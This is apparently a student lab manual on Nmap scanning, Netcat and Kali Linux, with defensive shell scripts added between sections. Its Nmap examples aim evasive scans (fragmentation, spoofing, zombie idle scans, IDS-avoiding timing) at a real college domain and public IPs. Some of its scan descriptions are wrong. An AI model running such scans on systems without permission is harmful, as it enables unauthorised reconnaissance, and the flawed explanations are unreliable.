Cyber Security

This document discusses various commands and options used for host discovery and TCP scanning using the Nmap tool. It provides examples of how to scan single hosts, ranges of IP addresses, lists of targets from a file and more. It also covers options for different types of ping scans like TCP SYN, TCP ACK and UDP to determine active systems on the network.

Uploaded by muskanbandaria

Practical 1:

Basic Linux/Unix Commands

Alias:
A way to run a command or a series of Unix commands using a shorter name than the one usually
associated with such commands.

Listing and Creating Aliases


The general syntax for the alias command varies somewhat according to the shell. In the case of
the bash shell it is
alias [-p] [name="value"]

alias p="pwd"
p

apt-get
apt-get is a tool to automatically update a Debian machine and to get and install Debian packages/programs.

200090107060
cat
A Unix/Linux command that can read, modify or concatenate text files. cat is most commonly used
for displaying the contents of a file.

cd
The cd command changes the current directory in Linux and lets you move between directories
conveniently.

chmod
chmod changes the access mode (permissions) of one or more files. Only the owner of a file or a
privileged user may change the access mode.
What are the permissions?

There are three general classes of users:

 The user who owns the file ("User")
 Users belonging to the file's defined ownership group ("Group")
 Everyone else ("Other")

In turn, for each of these classes of user, there are three types of file access:

Permission   Action      chmod option
read         (view)      r or 4
write        (edit)      w or 2
execute      (execute)   x or 1

There are three types of user restriction:

User    ls output
owner   -rwx------
group   ----rwx---
other   -------rwx

Folder/Directory Permissions
Directories have directory permissions. The directory permissions restrict different actions than with files or device nodes.

Permission   Action                                 chmod option
read         (view contents, i.e. ls command)       r or 4
write        (create or remove files from dir)      w or 2
execute      (cd into directory)                    x or 1

For more help refer to https://help.ubuntu.com/community/FilePermissions
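As an added example (not part of the lab manual), the following POSIX shell script converts between the ls-style permission string and the octal form that chmod accepts, and then uses that conversion to audit the mode of a file on disk. The function names, the temporary file and the world-writable check are this example's own choices, not something the manual defines.

```sh
#!/bin/sh
# Added example, not part of the lab manual: translate between the symbolic
# permission string that ls prints and the octal form chmod accepts, then use
# that to audit the mode of a file on disk. Uses only POSIX sh, ls, chmod, cut.

# perm_to_octal "-rwxr-x---" -> 750. A leading file-type character ("-", "d",
# "l", ...) is ignored; s/t in the execute column (setuid/setgid/sticky) still
# count as executable for that class.
perm_to_octal() {
    s=$1
    [ "${#s}" -eq 10 ] && s=${s#?}
    if [ "${#s}" -ne 9 ]; then
        echo "perm_to_octal: bad permission string '$1'" >&2
        return 1
    fi
    out=""
    i=1
    while [ "$i" -le 9 ]; do        # one rwx triplet each for user, group, other
        d=0
        [ "$(printf '%s' "$s" | cut -c"$i")" = r ] && d=$((d + 4))
        [ "$(printf '%s' "$s" | cut -c"$((i + 1))")" = w ] && d=$((d + 2))
        case $(printf '%s' "$s" | cut -c"$((i + 2))") in
            x | s | t) d=$((d + 1)) ;;
        esac
        out="$out$d"
        i=$((i + 3))
    done
    echo "$out"
}

# octal_to_perm 640 -> "rw-r-----". A 4-digit mode such as 0755 has its leading
# special-bits digit dropped.
octal_to_perm() {
    o=$1
    [ "${#o}" -eq 4 ] && o=${o#?}
    out=""
    for d in $(printf '%s' "$o" | sed 's/./& /g'); do
        case $d in
            0) out="${out}---" ;; 1) out="${out}--x" ;;
            2) out="${out}-w-" ;; 3) out="${out}-wx" ;;
            4) out="${out}r--" ;; 5) out="${out}r-x" ;;
            6) out="${out}rw-" ;; 7) out="${out}rwx" ;;
            *) echo "octal_to_perm: bad octal digit '$d'" >&2; return 1 ;;
        esac
    done
    echo "$out"
}

# file_mode_octal PATH -> the file's mode as chmod would set it, read from ls -ld
file_mode_octal() {
    perm_to_octal "$(ls -ld "$1" | cut -c1-10)"
}

# world_writable PATH -> "yes" if "other" has the write bit, a classic audit finding
world_writable() {
    case $(file_mode_octal "$1") in
        *[2367]) echo yes ;;
        *) echo no ;;
    esac
}

# Demonstration on a throwaway file
demo() {
    f=$(mktemp)
    chmod 640 "$f"
    echo "$(ls -ld "$f" | cut -c1-10) -> $(file_mode_octal "$f"), world writable: $(world_writable "$f")"
    chmod 666 "$f"
    echo "$(ls -ld "$f" | cut -c1-10) -> $(file_mode_octal "$f"), world writable: $(world_writable "$f")"
    rm -f "$f"
}
demo
```

The world-writable check is the one worth running over configuration directories: any mode whose last digit is 2, 3, 6 or 7 lets every local account edit the file, which for a file read by a privileged service is a privilege-escalation path.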

cmp
The cmp utility compares two files of any type and writes the results to the standard output. By default,
cmp is silent if the files are the same; if they differ, the byte and line number at which the first
difference occurred is reported.

cp
The cp command copies files and directories; a copy can be made simultaneously to another directory if
the copy is under a different name.

date
date sets a system's date and time. It is also a useful way to output/print the current date and time
when working in a script file.

df
df displays the amount of disk space available on the file system containing each file name argument.
With no file name, available space on all currently mounted file systems is shown.

echo
echo writes its arguments (a line of text or the value of a variable) to standard output.

grep
grep searches files for a given character string or pattern and can replace the string with another.

ls
The ls command lists files and directories within the current working directory, allowing admins to see
when configuration files were last edited.

mv
The mv command is used to move files and directories.

rm
Removes the specified files from the file system.

mkdir
Creates a new directory.

rmdir
Deletes the specified directory.

nslookup
nslookup allows a user to enter a host name and find the corresponding IP address. The reverse of that
process, finding the host name for an IP address, is also possible.

ping
ping allows a user to verify that a particular IP address exists and can accept requests.

sudo
sudo allows a system admin to give certain users the ability to run some (or all) commands at the root
level, and it logs all commands and arguments.

less
The "less" command is used to view files instead of opening them in an editor. less does not have to read
the entire input file before starting, so with large input files it starts up faster than text editors
like vi.

clear
This command clears the visible area of the console.

du
This command, when executed without any parameters, shows the total disk space occupied by files and
subdirectories in the current directory.

df
This command, when used without any option, displays information about the total disk space, the disk
space currently in use and the free space on all the mounted drives.

touch
The touch command is the easiest way to create a new, empty file.

who
This command prints the username associated with the current effective user id.

Sign: _______ _ _ __
Practical – 2: TCP Scanning Using Nmap

Target Specification:

1. Scan a single host or an IP address (IPv4)


1. Scan single IP Address
Ex:- nmap 65.1.234.224

2. Scan a host name


Ex:- nmap ckpcet.ac.in

3. Scan a host name with more info


Ex:- nmap -v ckpcet.ac.in

2. Scan multiple IP addresses or a subnet (IPv4)
Ex:- nmap 65.1.234.223 65.1.234.224 65.1.234.225

Ex:- nmap 65.1.234.223,224,225

Scan a range of IP address:-
Ex:- nmap 65.1.234.220-230

Scan a range of IP address using a wildcard:


Ex:- nmap 65.1.234.*

Scan a subnet using CIDR notation:-
Ex:- nmap <IP address>/<prefix length>

3. Read list of hosts/networks from a file (IPv4)


The -iL option allows you to read the list of target systems from a text file. This is
useful to scan a large number of hosts/networks. Create a text file as follows:
cat > <file name>
Ex:- nmap -iL <input file name>

4. Random Host to scan


For random host scanning the -iR option is used: Nmap generates its own targets to scan.
The <number of hosts> argument tells nmap the number of IPs to generate.
Ex:- nmap -iR 3

5. Excluding hosts/networks (IPv4)
When scanning a large number of hosts/networks you can exclude hosts from a scan.
Ex1: nmap 172.16.1.0/25 --exclude 172.16.1.25

Ex2: nmap 172.16.1.0/25 --exclude 172.16.1.25,172.16.1.23

6. Excluding hosts/networks listed in a file (IPv4)

Ex: nmap 172.16.1.0/25 --excludefile <file name>
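Added example, not from the manual: a POSIX shell script that expands the target notations covered above (a single address, a last-octet range, a last-octet wildcard, a comma list in the last octet and a /24-or-smaller CIDR block) into a host list suitable for nmap -iL, and drops hosts the way --exclude does. The function names and the EXCLUDE variable are this example's own conventions; the 192.0.2.x addresses are documentation addresses, not real targets.

```sh
#!/bin/sh
# Added example, not part of the lab manual: expand Nmap-style target
# specifications into one host per line (the form read by nmap -iL) and drop
# hosts listed in EXCLUDE, mirroring nmap --exclude. Handles a plain IPv4
# address, a last-octet range (a.b.c.10-20), a last-octet wildcard (a.b.c.*),
# a comma list in the last octet (a.b.c.1,5,9) and a /24..32 CIDR block.
# Hostnames and ranges in other octets are not handled and are reported.

expand_target() {
    spec=$1
    prefix=${spec%.*}          # first three octets
    last=${spec##*.}           # last field: "7", "10-20", "*", "1,5,9" or "250/30"
    case $spec in
        */*)                   # CIDR block a.b.c.d/N, N in 24..32
            n=${spec#*/}
            ip=${spec%/*}
            prefix=${ip%.*}
            host=${ip##*.}
            if [ "$n" -lt 24 ] || [ "$n" -gt 32 ]; then
                echo "expand_target: only /24 to /32 are supported: $spec" >&2
                return 1
            fi
            size=$((1 << (32 - n)))
            i=$((host / size * size))     # align to the block's network address
            end=$((i + size))
            while [ "$i" -lt "$end" ]; do echo "$prefix.$i"; i=$((i + 1)); done ;;
        *.\*)                  # wildcard: a.b.c.0 .. a.b.c.255
            i=0
            while [ "$i" -le 255 ]; do echo "$prefix.$i"; i=$((i + 1)); done ;;
        *-*)                   # range in the last octet
            i=${last%-*}
            end=${last#*-}
            while [ "$i" -le "$end" ]; do echo "$prefix.$i"; i=$((i + 1)); done ;;
        *,*)                   # comma list in the last octet
            for o in $(printf '%s' "$last" | tr ',' ' '); do echo "$prefix.$o"; done ;;
        *.*.*.*)               # a single dotted address
            echo "$spec" ;;
        *)
            echo "expand_target: unsupported target specification: $spec" >&2
            return 1 ;;
    esac
}

# build_target_list SPEC... -> unique hosts, numerically sorted, minus $EXCLUDE
# (a space-separated list of addresses; empty by default).
build_target_list() {
    for spec in "$@"; do expand_target "$spec"; done |
        sort -t . -k1,1n -k2,2n -k3,3n -k4,4n -u |
        while IFS= read -r host; do
            skip=no
            for e in $EXCLUDE; do
                if [ "$host" = "$e" ]; then skip=yes; fi
            done
            if [ "$skip" = no ]; then echo "$host"; fi
        done
}

# Demonstration: write a list for nmap -iL from three overlapping specs
demo() {
    EXCLUDE="192.0.2.5 192.0.2.7"
    list=$(mktemp)
    build_target_list 192.0.2.1-6 192.0.2.4,7,9 192.0.2.250/30 > "$list"
    echo "$(wc -l < "$list" | tr -d ' ') hosts written to $list; scan with: nmap -sn -iL $list"
    cat "$list"
    rm -f "$list"
}
demo
```

Building the list in a file and reviewing it before the scan is the habit worth keeping: an off-by-one in a range or a CIDR prefix is visible in the file, whereas nmap on the command line would silently scan the wrong hosts.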

Host Discovery:

7. -sL (list scan)


The list scan is a degenerate form of host discovery that simply lists each host of the
network(s) specified, without sending any packets to the target hosts. Since the idea is to simply
print a list of target hosts, options for higher level functionality such as port scanning, OS
detection, or ping scanning cannot be combined with this.
Ex: nmap -sL 172.16.1.*

8. -sn (No port scan)
This option tells Nmap not to do a port scan after host discovery, and only to print out
the available hosts that responded to the scan.
Ex: nmap -sn 172.16.1.*

9. -Pn (No ping Scan)
This option skips the Nmap discovery stage altogether. Normally, Nmap uses this
stage to determine active machines for heavier scanning. By default, Nmap only performs
heavy probing such as port scans, version detection, or OS detection against hosts that are
found to be up. Disabling host discovery with -Pn causes Nmap to attempt the requested
scanning functions against every target IP address specified. So if a class B target address space
(/16) is specified on the command line, all 65,536 IP addresses are scanned. Proper host
discovery is skipped as with the list scan, but instead of stopping and printing the target list,
Nmap continues to perform requested functions as if each target IP is active.
Ex: nmap -Pn ckpcet.ac.in

10. -PS (TCP-SYN ping)


The TCP SYN ping accomplishes its goal in just a few packets. This minimal amount
of network traffic appears to be normal TCP handshake frames. This makes the TCP SYN ping
appear almost invisible when compared to normal network traffic.
Ex: nmap -PS ckpcet.ac.in

11. -PA (TCP-ACK ping)
The TCP-ACK ping uses little network traffic. In most cases, the common ACK
query to a device is relatively undetectable. The TCP-ACK ping also allows different port
numbers to be probed, providing nmap with additional options when negotiating a scan through
a firewall. The TCP-ACK ping identifies a filtered connection or a non-filtered connection.
This is a perfect use of a ping probe, since the goal of the ping is to get any type of response
from a remote device. An nmap ping doesn't focus on identifying ports. Instead, its goal is to
locate other active devices.
Ex: nmap -PA ckpcet.ac.in

12. -PU (UDP ping)

The port list takes the same format as with the previously discussed -PS and -PA
options. If no ports are specified, the default is 40125. The primary advantage of this scan type
is that it bypasses firewalls and filters that only screen TCP.
Ex: nmap -PU ckpcet.ac.in

13. -PO (IP Protocol Ping)
One of the newer host discovery options is the IP protocol ping, which sends IP
packets with the specified protocol number set in their IP header. The protocol list takes the
same format as do port lists in the previously discussed TCP and UDP host discovery options.
Ex: nmap -PO ckpcet.ac.in

14. --traceroute
Traceroutes are performed post-scan using information from the scan results to
determine the port and protocol most likely to reach the target. It works with all scan types
except connect scans (-sT) and idle scans (-sI). All traces use Nmap's dynamic timing model
and are performed in parallel.
Ex: nmap --traceroute ckpcet.ac.in

15. -sS (TCP SYN Scan)
SYN scanning, or half-open scanning, is where the full TCP connection is never
made. SYN scanning sends the first packet only, the one marked with the SYN flag, and waits
for either a RST, ACK or SYN-ACK response. If a RST-ACK response comes in, nothing is
running on the port (the target answers with a RST). If a SYN-ACK response is received, a service
is known to be running on the port. The benefit of TCP SYN scanning is the fact that most
logging applications do not log TCP RST by default; they generally create a log entry
in the application/device/server when the final ACK comes from the client device. Because
that final ACK never comes (a RST is sent instead), a scan can go unnoticed while it is taking place.
Ex: nmap -sS ckpcet.ac.in

16. -sT (TCP connect Scan)

An attacker uses full TCP connection attempts to determine if a port is open. The
scanning process involves completing a 'three-way handshake' with a remote port, and reports
the port as closed if the full handshake cannot be established. An advantage of TCP connect
scanning is that it works against any TCP/IP stack. RFC 793 defines how TCP connections are
established and torn down. TCP connect scanning commonly involves establishing a full
connection and then subsequently tearing it down, and therefore involves sending a significant
number of packets to each port that is scanned. Compared to other types of scans, a TCP
connect scan is slow and methodical.
Ex: nmap -sT ckpcet.ac.in

17. -sU (UDP Scan)
UDP port scan available for common UDP services. The UDP port scan is part of the
IP Tools range of network testing tools. The test uses the excellent Nmap Port Scanner to scan
5 of the most common UDP ports. Ports tested in the quick UDP scan are 53, 123, 161, 5353
and 1900.
Ex: nmap -sU ckpcet.ac.in

18. -sY (SCTP INIT Scan)
SCTP is a relatively new alternative to the TCP and UDP protocols, combining most
characteristics of TCP and UDP, and also adding new features like multi-homing and multi-
streaming. It is mostly being used for SS7/SIGTRAN related services but has the potential to
be used for other applications as well. SCTP INIT scan is the SCTP equivalent of a TCP SYN
scan. It can be performed quickly, scanning thousands of ports per second on a fast network
not hampered by restrictive firewalls. Like SYN scan, INIT scan is relatively unobtrusive and
stealthy, since it never completes SCTP associations. It also allows clear, reliable
differentiation between the open, closed, and filtered states. This technique is often referred to
as half-open scanning.
Ex: nmap -sY ckpcet.ac.in

19. -sF (FIN Scan)

Similar to the SYN scan, but a FIN flag is sent to the target instead. Closed ports
are required to reply to the probe packet with RST, while open ports must ignore the packet in
question.
Ex: nmap -sF ckpcet.ac.in

20. -sN (Null Scan)
In a NULL scan, the packet is sent without any flag set. This takes advantage of RFC
793, as the RFC does not specify how the system should respond. Most UNIX and UNIX-related
systems respond with a RST (if the port is open) to close the connection.
Ex: nmap -sN ckpcet.ac.in

21. -sX (Xmas Scan)

In an Xmas scan, all the available flags in the TCP header are set (ACK, FIN, RST, SYN,
URG and PSH) to give the scan an ornamental look. This scan works on UNIX and related
systems and causes the kernel to drop the packet if the receiving port is open.
Ex: nmap -sX ckpcet.ac.in

22. -sA (TCP ACK Scan)
This type of scanning is used to map out firewall rule sets. It can determine whether the
firewall is stateful or just a packet filter that blocks incoming SYN packets. In this type of scan
an ACK packet is sent to the port; if it replies with an RST it is unfiltered and
open, and if no reply is returned it is classified as filtered.
Ex: nmap -sA ckpcet.ac.in

23. -sW (TCP Window Scan)


Window scan is exactly the same as ACK scan except that it exploits an
implementation detail of certain systems to differentiate open ports from closed ones, rather
than always printing unfiltered when a RST is returned. It does this by examining the TCP
Window field of the RST packets returned. On some systems, open ports use a positive window
size (even for RST packets) while closed ones have a zero window. So instead of always listing
a port as unfiltered when it receives a RST back, Window scan lists the port as open or closed
if the TCP Window value in that reset is positive or zero, respectively. This scan relies on an
implementation detail of a minority of systems out on the Internet, so you can't always trust it.
Systems that don't support it will usually return all ports closed. Of course, it is possible that
the machine really has no open ports. If most scanned ports are closed but a few common port
numbers (such as 22, 25, and 53) are filtered, the system is most likely susceptible.
Occasionally, systems will even show the exact opposite behaviour. If your scan shows 1,000
open ports and three closed or filtered ports, then those three may very well be the truly open
ones.
Ex: nmap -sW ckpcet.ac.in

24. -sI <zombie host>[:<probeport>] (Idle Scan)
This advanced scan method allows for a truly blind TCP port scan of the target
(meaning no packets are sent to the target from your real IP address). Instead, a unique side-
channel attack exploits predictable IP fragmentation ID sequence generation on the zombie
host to glean information about the open ports on the target. IDS systems will display the scan
as coming from the zombie machine you specify (which must be up and meet certain criteria).
Full details of this fascinating scan type are in the section called "TCP Idle Scan (-sI)".
Besides being extraordinarily stealthy (due to its blind nature), this scan type permits
mapping out IP-based trust relationships between machines. The port listing shows open ports
from the perspective of the zombie host. So you can try scanning a target using various zombies
that you think might be trusted (via router/packet filter rules).
You can add a colon followed by a port number to the zombie host if you wish to
probe a particular port on the zombie for IP ID changes. Otherwise Nmap will use the port it
uses by default for TCP pings (80).
Ex: nmap --packet-trace -sI 172.16.1.17 172.16.1.18

25. -sO (IP protocol Scan)


IP protocol scan allows you to determine which IP protocols (TCP, ICMP, IGMP,
etc.) are supported by target machines. This isn't technically a port scan, since it cycles through
IP protocol numbers rather than TCP or UDP port numbers. Yet it still uses the -p option to
select scanned protocol numbers, reports its results within the normal port table format, and
even uses the same underlying scan engine as the true port scanning methods.
Ex: nmap -sO ckpcet.ac.in

Version Detection:

26. -sV (Version detection)


Enables version detection.
Ex: nmap -sV ckpcet.ac.in

27. --allports (Don't exclude any ports from version detection)


By default, Nmap version detection skips TCP port 9100 because some printers
simply print anything sent to that port, leading to dozens of pages of HTTP GET requests,
binary SSL session requests, etc. This behaviour can be changed by modifying or removing the
Exclude directive in nmap-service-probes, or you can specify --allports to scan all ports
regardless of any Exclude directive.
Ex: nmap --allports ckpcet.ac.in

28. -O (To know remote operating system)


Ex: nmap -O ckpcet.ac.in

Timing and Performance:

29. -T<0-5> set timing template (higher is faster)

There are various timing options included in nmap to control how quickly successive packets are
sent. They can be used to evade some of the rules in firewalls or IDS.
T0: Paranoid (waits 5 minutes between sending each probe, not detected by IDS/IPS)
T1: Sneaky (waits 15 seconds)
T2: Polite
T3: Normal
T4: Aggressive
T5: Insane (easily detectable)
Ex: nmap -T<0-5> ckpcet.ac.in

Ex2: nmap -v -sS -A -T4 ckpcet.ac.in

Firewall/IDS Evasion and Spoofing:

30. -f (Packet Fragmentation)


The -f option causes the requested scan (including ping scans) to use tiny fragmented
IP packets. The idea is to split up the TCP header over several packets to make it harder for
packet filters, intrusion detection systems, and other annoyances to detect what you are doing.
Ex: nmap -f ckpcet.ac.in

31. -S <IP_Address> : Spoof source address

An attacker can spoof the source IP address (from the victim's subnet) so that it appears
to the IDS/firewall to be a legitimate user and is passed.
Ex: nmap -v -sT -PN --spoof-mac 0 192.168.1.1

32. -oN/-oX/-oS/-oG <file>
Output scan in normal, XML, s|<rIpt kIddi3, and grepable format, respectively, to the
given filename.
Ex: nmap -oN output.txt ckpcet.ac.in
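Added example, not from the manual: the grepable format (-oG) is the one a defender usually post-processes. The shell/awk script below pulls the open ports out of a -oG file and reports any that are not on an allowlist of ports that are supposed to be exposed. The scan data is constructed for the example (documentation addresses, made-up service banners), the allowlist is an assumption, and the function names are this example's own. Real -oG lines separate their fields with tabs; the parser accepts tabs or spaces.

```sh
#!/bin/sh
# Added example, not part of the lab manual: read nmap's grepable (-oG) output
# and pull out the open ports per host, then compare them with an allowlist of
# ports that are supposed to be exposed. The scan data below is constructed for
# the example, not a real scan.

SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap -sV -oG scan.gnmap 192.0.2.0/29
Host: 192.0.2.1 ()  Status: Up
Host: 192.0.2.1 ()  Ports: 22/open/tcp//ssh//OpenSSH 8.9/, 80/open/tcp//http//nginx 1.18/, 443/filtered/tcp//https///  Ignored State: closed (997)
Host: 192.0.2.2 ()  Status: Up
Host: 192.0.2.2 ()  Ports: 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///  Ignored State: closed (998)
# Nmap done -- 8 IP addresses (2 hosts up) scanned in 10.00 seconds'

# open_ports < gnmap -> "host port/proto service [version]" for every open port.
# Each Ports: entry is port/state/proto/owner/service/rpcinfo/version.
open_ports() {
    awk '
    /^Host:/ && /Ports:/ {
        host = $2
        line = $0
        sub(/.*Ports: /, "", line)
        sub(/[ \t]*(Ignored State|Seq Index|IPID Seq|OS):.*/, "", line)
        n = split(line, entry, /, /)
        for (i = 1; i <= n; i++) {
            split(entry[i], f, "/")
            if (f[2] != "open") continue
            out = host " " f[1] "/" f[3] " " f[5]
            if (f[7] != "") out = out " " f[7]
            print out
        }
    }'
}

# unexpected_exposure "22 80 443" < gnmap -> open ports not on the allowlist
unexpected_exposure() {
    open_ports | awk -v allow="$1" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    { port = $2; sub(/\/.*/, "", port); if (!(port in ok)) print $1, $2 }'
}

# hosts_up < gnmap -> number of hosts that answered host discovery
hosts_up() { grep -c 'Status: Up'; }

# Demonstration on the constructed scan
demo() {
    echo "hosts up: $(printf '%s\n' "$SAMPLE_GNMAP" | hosts_up)"
    printf '%s\n' "$SAMPLE_GNMAP" | open_ports
    echo "open but not on the 22/80/443 allowlist:"
    printf '%s\n' "$SAMPLE_GNMAP" | unexpected_exposure "22 80 443"
}
demo
```

The split on ", " assumes version strings contain no comma-space sequence; for anything more elaborate the XML output (-oX) with a proper parser is the safer input, which is why the XML format is usually preferred for automation.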

33. --open
Only show open (or possibly open) ports
Ex: nmap --open ckpcet.ac.in

34. --iflist
Print host interfaces and routes (for debugging)
Ex: nmap --iflist

35. --reason
Display the reason a port is in a particular state
Ex: nmap --reason ckpcet.ac.in

36. --packet-trace
Show all packets sent and received
Ex: nmap --packet-trace ckpcet.ac.in

MISC:
37. -6
Enable IPv6 scanning
Ex: nmap -6 www.ipv6.net.cn

38. -V
Print version number
Ex: nmap -V

39. -h
Print this help summary page.
Ex: nmap -h

40. -A
Enable OS detection, version detection, script scanning, and traceroute
Ex: nmap -A ckpcet.ac.in

41. -p <port ranges>
Only scan specified ports
Ex: nmap -p 80 ckpcet.ac.in
nmap -p 50-100 ckpcet.ac.in
nmap -p 80,443 ckpcet.ac.in

42. --exclude-ports <port ranges>
Exclude the specified ports from scanning
Ex: nmap ckpcet.ac.in --exclude-ports 80

43. -F (Fast mode)


Scan fewer ports than the default scan
Ex: nmap -F ckpcet.ac.in

44. -r
Scan ports consecutively
Ex: nmap -r ckpcet.ac.in

45. --top-ports <number>

Scan the <number> most common ports
Ex: nmap --top-ports 10 ckpcet.ac.in

Sign: _______ _ _ __

Practical – 3: TCP / UDP Connectivity Using Netcat

Netcat:
Netcat (often abbreviated to nc) stands for "network concatenate". Also known as the
TCP/IP Swiss army knife, it is a feature-rich network utility which can be used to read and write
data to network connections using TCP or UDP. Following are the applications of Netcat:
1. Chat Server
2. Web Server
3. Port Scanning
4. File transfer
5. Getting Remote Shell (Ethical Way)

Chat Server:
To create a simple chat we need two instances of Netcat, one to listen for incoming
connections (Server side) and another one to start the connection (Client side).

Server side:
1. Open a terminal and run the command netcat -l -p <port number>
Where -l is used to start listening mode and
-p is used to specify a port.

2. When the connection is established you can communicate with the client.

Client side:
1. To connect with the server, the client needs the IP address of the server. After getting the server's
IP address, run the following command in the client's terminal:

netcat <Server's IP address> <Port number>

Where the port number is the port used by the server.

2. Now the connection is established and you can communicate with the server.

File Transfer:
Although the TCP protocol is primarily used for transferring web traffic around the
world, it can actually be implemented at a local level for file transfers. To accomplish this, you
need to run Netcat from two locations: one that will act as a server to send the file and one that
will act as the client to receive it.

Server Side:
1. Create a blank file to store the data which is sent by the client.

2. Run the following command to receive data:

netcat -l -p 1234 > <file name>
Where -l is used to start listening mode,
-p is used to specify a port, and
> is used to store the data in the blank file.

3. Now view the file; you can see the data that was sent by the client.

Client Side:
1. Create a file that contains the data which you want to send.

2. Run the following command to send data:

netcat <Server's IP address> <Port number> < <file name>

In a file transfer the client can also be the receiver and the server the sender. For that
you need to change the commands slightly: on the server side, netcat -l -p 1234 < <file name>,
and on the client side, netcat <Server's IP address> <Port number> > <file name>.
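Added example, not from the manual: netcat delivers bytes but gives no indication that all of them arrived or that they came from the expected sender, so a truncated or altered file lands silently. The script below wraps the manual's send and receive commands with a checksum that the sender reports out of band (in the chat session, for instance) and the receiver compares. The function names are this example's own; the listener syntax (-l -p) is the one the manual uses and OpenBSD nc omits -p; the demonstration exercises only the comparison, not netcat itself.

```sh
#!/bin/sh
# Added example, not part of the lab manual: netcat delivers bytes but gives
# no indication that all of them arrived or that they came from the expected
# sender. This wraps the manual's transfer commands with a checksum that the
# sender reports out of band and the receiver compares.

# checksum FILE -> SHA-256 when sha256sum exists (detects tampering as well as
# truncation), otherwise the POSIX cksum CRC plus byte count (detects
# truncation and corruption only; a CRC can be forged).
checksum() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum < "$1" | awk '{ print $1 }'
    else
        cksum < "$1" | awk '{ print $1 "-" $2 }'
    fi
}

# verify_received FILE EXPECTED -> "ok" or "MISMATCH"
verify_received() {
    if [ "$(checksum "$1")" = "$2" ]; then echo ok; else echo MISMATCH; fi
}

# same_content A B -> "ok" when both files checksum identically
same_content() { verify_received "$2" "$(checksum "$1")"; }

# Server side (receiver): receive_file PORT FILE EXPECTED
# Listener syntax follows the manual (netcat -l -p); OpenBSD nc uses "nc -l PORT".
receive_file() {
    netcat -l -p "$1" > "$2"
    verify_received "$2" "$3"
}

# Client side (sender): send_file HOST PORT FILE
# Prints the checksum first so it can be handed to the receiver out of band.
send_file() {
    echo "checksum of $3: $(checksum "$3")"
    netcat "$1" "$2" < "$3"
}

# Demonstration of the check itself, with a copy that was cut short
demo() {
    src=$(mktemp); dst=$(mktemp)
    printf 'payload for the netcat lab\n' > "$src"
    cp "$src" "$dst"
    echo "full copy: $(same_content "$src" "$dst")"
    dd if="$src" of="$dst" bs=1 count=8 2>/dev/null
    echo "truncated copy: $(same_content "$src" "$dst")"
    rm -f "$src" "$dst"
}
demo
```

The checksum still travels over the same untrusted channel unless it is sent separately; netcat provides no confidentiality or authentication at all, which is the reason it is a lab tool and not a file-transfer protocol.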

Sign: _______ _ _ __

Practical-4:
Install Kali Linux. Examine the utilities and tools available in
Kali Linux and find out which tool is the best for finding
cyberattack/vulnerability.

Kali Linux:
Kali Linux is an open-source, Debian-based Linux distribution aimed at advanced
Penetration Testing and Security Auditing. Kali Linux contains several hundred tools targeted
towards various information security tasks, such as Penetration Testing, Security Research,
Computer Forensics and Reverse Engineering. Kali Linux is a multi-platform solution,
accessible and freely available to information security professionals and hobbyists.

Installation of Kali Linux Using VirtualBox:

1. Download and install VirtualBox:

The easiest way to install VirtualBox is by using the official Ubuntu repositories.
1. Open terminal and enter the following command to update the repository:
sudo apt-get update

2. Download and install VirtualBox with the following command:
sudo apt install virtualbox virtualbox-ext-pack

Read the VirtualBox Extension Pack Personal Use and Evaluation License and select <Ok> to
confirm you understand.

Accept the terms of the VirtualBox PUEL license by selecting <Yes> and hitting Enter.

Finally, the output displays you have successfully installed "Oracle VM VirtualBox Extension
Pack".

Interface of VirtualBox:

2. Load ISO file of Kali Linux in VirtualBox:

1. Download ISO file for VirtualBox from official site of Kali Linux.

2. Import ISO of Kali Linux in VirtualBox as follows:


File Menu > Import Appliance > Browse Kali > Next > Import > Agree

Overview of Kali Linux:

Kali Linux has around 600 pre-installed penetration-testing tools. All tools are
divided as per their use like:
1. Information Gathering Tools
2. Vulnerability Analysis Tools
3. Web Application Analysis Tools
4. Database Assessment Tools
5. Password Attacks Tools
6. Wireless Attacks Tools
7. Reverse Engineering Tools
8. Exploitation Tools
9. Sniffing & Spoofing Tools
10. Post Exploitation Tools
11. Forensics Tools
12. Reporting Tools
13. Social Engineering Tools

Nmap:
Nmap (Network Mapper) is a free and open-source network scanner created
by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich). Nmap is used to
discover hosts and services on a computer network by sending packets and analyzing the
responses.
Nmap provides a number of features for probing computer networks, including host
discovery and service and operating system detection. These features are extensible
by scripts that provide more advanced service detection, vulnerability detection, and other
features. Nmap can adapt to network conditions including latency and congestion during a scan.

Uses of Nmap:
1. To determine what hosts are available on the network.
2. Available services (application name and version) those hosts are offering.
3. Operating systems (and OS versions) they are running.
4. Type of packet filters/firewalls are in use.

Wireshark:
Wireshark is an open-source network protocol analysis software program started
by Gerald Combs in 1998. A global organization of network specialists and software
developers support Wireshark and continue to make updates for new network technologies and
encryption methods.

Wireshark is absolutely safe to use. Government agencies, corporations, non-profits,
and educational institutions use Wireshark for troubleshooting and teaching purposes. There
isn't a better way to learn networking than to look at the traffic under the Wireshark
microscope.

There are questions about the legality of Wireshark since it is a powerful packet sniffer.
The Light side of the Force says that you should only use Wireshark on networks where you
have permission to inspect network packets. Using Wireshark to look at packets without
permission is a path to the Dark Side.

Functionality:

1. Wireshark is very similar to tcpdump, but has a graphical front-end, plus some integrated
sorting and filtering options.

2. User can see all traffic visible on that interface.

3. A remote machine can capture packets and send them to a machine running Wireshark
using the TZSP protocol, so Wireshark can analyse packets captured on a remote machine at
the time they are captured.

4. It understands the structure of different networking protocols. It can parse and display the
fields along with their meaning as specified by different protocols.

5. You can use it to review traffic captured by tools like tcpdump or windump or use it to
capture traffic directly.

6. It also supports capture formats from several other commercial and open source network
sniffers.

Use of Wireshark:

1. Network administrators use it to troubleshoot network problems.

2. Network security engineers use it to examine security problems.

3. Developers use it to debug protocol implementations.

4. People use it to learn network protocol internals.

5. Display the network traffic in human-readable format.

Metasploit Framework:

The Metasploit Project is a computer security project that provides information
about security vulnerabilities and aids in penetration testing and IDS signature development. It
is owned by Boston, Massachusetts-based security company Rapid7.
Its best-known sub-project is the open-source Metasploit Framework, a tool for
developing and executing exploit code against a remote target machine. Other important sub-
projects include the Opcode Database, shell code archive and related research.
The Metasploit Project includes anti-forensic and evasion tools, some of which are built
into the Metasploit Framework. Metasploit is pre-installed in the Kali Linux operating system.

Sign: _______ _ _ __

Practical – 5:
Evaluate Network Defence tools for the following:
1. IP spoofing
2. DoS Attacks

